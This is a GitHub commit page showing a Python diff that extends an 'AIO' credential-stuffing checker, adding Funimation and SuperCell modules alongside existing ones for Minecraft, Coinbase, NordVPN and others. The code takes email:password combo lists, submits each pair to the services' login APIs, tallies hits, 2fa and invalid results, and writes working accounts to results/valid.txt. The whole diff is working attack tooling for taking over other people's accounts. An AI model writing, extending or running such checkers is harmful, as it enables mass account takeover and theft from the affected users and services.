Skip to content

Commit

Permalink
Update Main.py
Browse files Browse the repository at this point in the history
  • Loading branch information
peefpee authored Dec 14, 2021
1 parent f3ede56 commit 2ae8850
Showing 1 changed file with 94 additions and 3 deletions.
97 changes: 94 additions & 3 deletions main.py
Original file line number Diff line number Diff line change
@@ -1,5 +1,6 @@
import os
from os import system
from os import system, name

import json
try:
import requests
Expand Down Expand Up @@ -27,9 +28,83 @@
print('Download the Config in https://raw.githubusercontent.com/bearbearteam/python-aio/main/config.json ! ')
time.sleep(5)
exit()
def clear():

# for windows
if name == 'nt':
_ = system('cls')

# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
def save():
with open('config.json', 'w+') as f:
json.dump(config, f)
class counter:
invalid = 0
hits = 0
free = 0
free2fa = 0
def loadcounter():
hits = str(counter.hits)
invalid = str(counter.invalid)
free = str(counter.free)
free2fa = str(counter.free2fa)
clear()
print(' Aio Status')
print(' Hits : '+hits)
print(' Invalids : '+invalid)
print(' Free : '+free)
print(' 2fa : '+free2fa)
clear()



def Funimation(combo,proxy):

x,y = combo.split(":", 1)
headers = requests.utils.default_headers()
headers.update(
{
'User-Agent': 'okhttp/3.12.1',

}
)
url = 'https://prod-api-funimationnow.dadcdigital.com/api/auth/login/'
data ={"email":x,"password":y}

r = requests.post(url, json=data,headers=headers)
if 'Failed Authentication' or 'false' in r.text:
status = 'false'
elif 'token' in r.text:
status = 'true'
elif r.status_code ==429:
status = 'false'

return status
def supercell(combo,proxy):

x,y = combo.split(":", 1)
headers = requests.utils.default_headers()
headers.update(
{
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',

}
)
url = 'https://mvfldg522i.execute-api.us-east-1.amazonaws.com/production/customers/login'
data ={"email":x}

r = requests.post(url, json=data,headers=headers)
if 'Bad request' in r.text:
status = 'false'
elif '{}' in r.text:
status = 'true'
elif r.status_code ==429:
status = 'false'
else :
status = 'false'
return status
def minecraft(combo,proxy):

x,y = combo.split(":", 1)
Expand Down Expand Up @@ -204,7 +279,7 @@ def proxy_loader(proxyfile):
return proxies

def combo_loader():
print('\nModules:\n1 : GeoGussr\n2 : Curiosity Stream\n3 : NordVPN\n4 : Picstart\n5 : Coinbase\n6 : malwarebytes\n7 : Adobe VM\n8 : Minecraft\nS : Settings')
print('\nModules:\n1 : GeoGussr\n2 : Curiosity Stream\n3 : NordVPN\n4 : Picstart\n5 : Coinbase\n6 : malwarebytes\n7 : Adobe VM\n8 : Minecraft\n9 : SuperCell VM\n10 : Funimation\nS : Settings')
module = input('Please input module number : ')

if module == 'S':
Expand Down Expand Up @@ -250,30 +325,46 @@ def combo_loader():
output = adobevm(x,proxyoutput)
elif module == '8':
output = minecraft(x,proxyoutput)
elif module == '9':
output = supercell(x,proxyoutput)
elif module == '10':
output = Funimation(x,proxyoutput)
else:
print('Bruh,Chose a Valid module')
time.sleep(10)
quit()
if output == 'true' :
counter.hits +=1
if log == "1":
print('valid : '+ x )
else:
loadcounter()
isdir = os.path.isdir('results')
if isdir == False :
os.mkdir('results')
f = open('results/valid.txt','a+')
accountwrite = (x+'\n')
f.write(accountwrite)
elif output == '2fa':
counter.free2fa +=1

if log == "1":
print('2fa : '+ x )
else:
loadcounter()
isdir = os.path.isdir('results')
if isdir == False :
os.mkdir('results')
f = open('results/2fa.txt','a+')
accountwrite = (x+'\n')
f.write(accountwrite)
elif output == 'false':
print('Invalid : ' + x)
counter.invalid +=1
if log == "1":
print('invalid : '+ x )
else:
loadcounter()

else:
print(output)
return file
Expand Down

0 comments on commit 2ae8850

Please sign in to comment.